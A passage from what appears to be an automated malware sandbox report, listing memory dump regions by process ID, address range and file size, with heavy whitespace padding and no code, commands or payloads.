                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5508-1026-0x0000000001030000-0x0000000001036000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5508-1022-0x0000000000860000-0x0000000000890000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  192KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5508-1034-0x0000000001060000-0x0000000001066000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5508-1031-0x0000000001040000-0x0000000001064000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  144KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5608-450-0x0000000000EC0000-0x0000000000EF2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  200KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5636-1035-0x0000023345BD0000-0x0000023346636000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10.4MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5724-894-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5824-969-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5964-1145-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5968-484-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6040-1472-0x0000000000610000-0x0000000000636000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  152KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6040-1485-0x0000000002760000-0x0000000002772000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  72KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6132-26581-0x0000000000400000-0x0000000000475000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  468KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6132-30326-0x0000000000400000-0x0000000000475000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  468KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6196-2511-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6460-2119-0x00000000008E0000-0x00000000009B8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  864KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6488-2125-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6516-2621-0x0000000000A40000-0x0000000000BBE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6680-2592-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6680-2637-0x0000000000400000-0x0000000000537000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7052-14697-0x00000000056A0000-0x00000000056DA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  232KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7052-12341-0x0000000000C50000-0x0000000000CDA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  552KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7128-19932-0x0000000000760000-0x000000000082E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  824KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7128-21505-0x00000000051A0000-0x00000000051DA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  232KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7208-2512-0x0000000000C20000-0x0000000000C44000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  144KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7208-2513-0x0000000000C50000-0x0000000000C56000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7208-2506-0x0000000000440000-0x0000000000472000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  200KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7208-2509-0x0000000000C10000-0x0000000000C16000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7264-11606-0x0000000001470000-0x0000000001478000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  32KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7264-11387-0x0000000000B30000-0x0000000000C16000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  920KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7284-2249-0x0000000000010000-0x00000000003AC000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7284-3592-0x0000000005230000-0x0000000005244000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  80KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7284-2510-0x0000000005850000-0x0000000005BA4000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  3.3MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7296-25923-0x0000000000400000-0x000000000051D000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7296-27485-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7296-27474-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  152KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7296-27477-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  572KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7340-3337-0x00000000047E0000-0x0000000004802000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  136KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7340-3336-0x0000000000090000-0x000000000013E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  696KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7436-8138-0x0000000000600000-0x000000000062E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  184KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7436-9160-0x0000000004EC0000-0x0000000004F06000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  280KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/7776-2770-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/8008-3335-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/8116-15763-0x0000000005CC0000-0x0000000005D26000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  408KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/8116-19704-0x0000000005160000-0x000000000517E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/8116-13037-0x0000000005620000-0x0000000005C48000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6.2MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/8116-13036-0x0000000002A70000-0x0000000002AA6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  216KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/8116-23535-0x00000000068E0000-0x00000000068FA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  104KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/8116-23454-0x0000000007B90000-0x000000000820A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6.5MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9044-30365-0x0000000001140000-0x0000000001164000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  144KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9044-30173-0x0000000001110000-0x0000000001116000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9044-29899-0x0000000000940000-0x0000000000970000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  192KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9372-30366-0x00000000007D0000-0x0000000000800000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  192KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9372-30512-0x0000000000FA0000-0x0000000000FA6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  24KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9428-16349-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  120KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9428-16441-0x0000000005020000-0x000000000506C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  304KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9428-16735-0x00000000052D0000-0x00000000053DA000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  1.0MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9428-16374-0x0000000005430000-0x0000000005A48000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  6.1MB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9428-16375-0x0000000004E80000-0x0000000004E92000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  72KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9428-16376-0x0000000004EE0000-0x0000000004F1C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  240KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9532-21278-0x00000000022B0000-0x00000000022D8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  160KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9532-21275-0x00000000020A0000-0x00000000020C8000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  160KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/9700-30373-0x0000000000A60000-0x0000000000A90000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  192KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/10040-21741-0x0000000000B30000-0x0000000000B46000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  88KB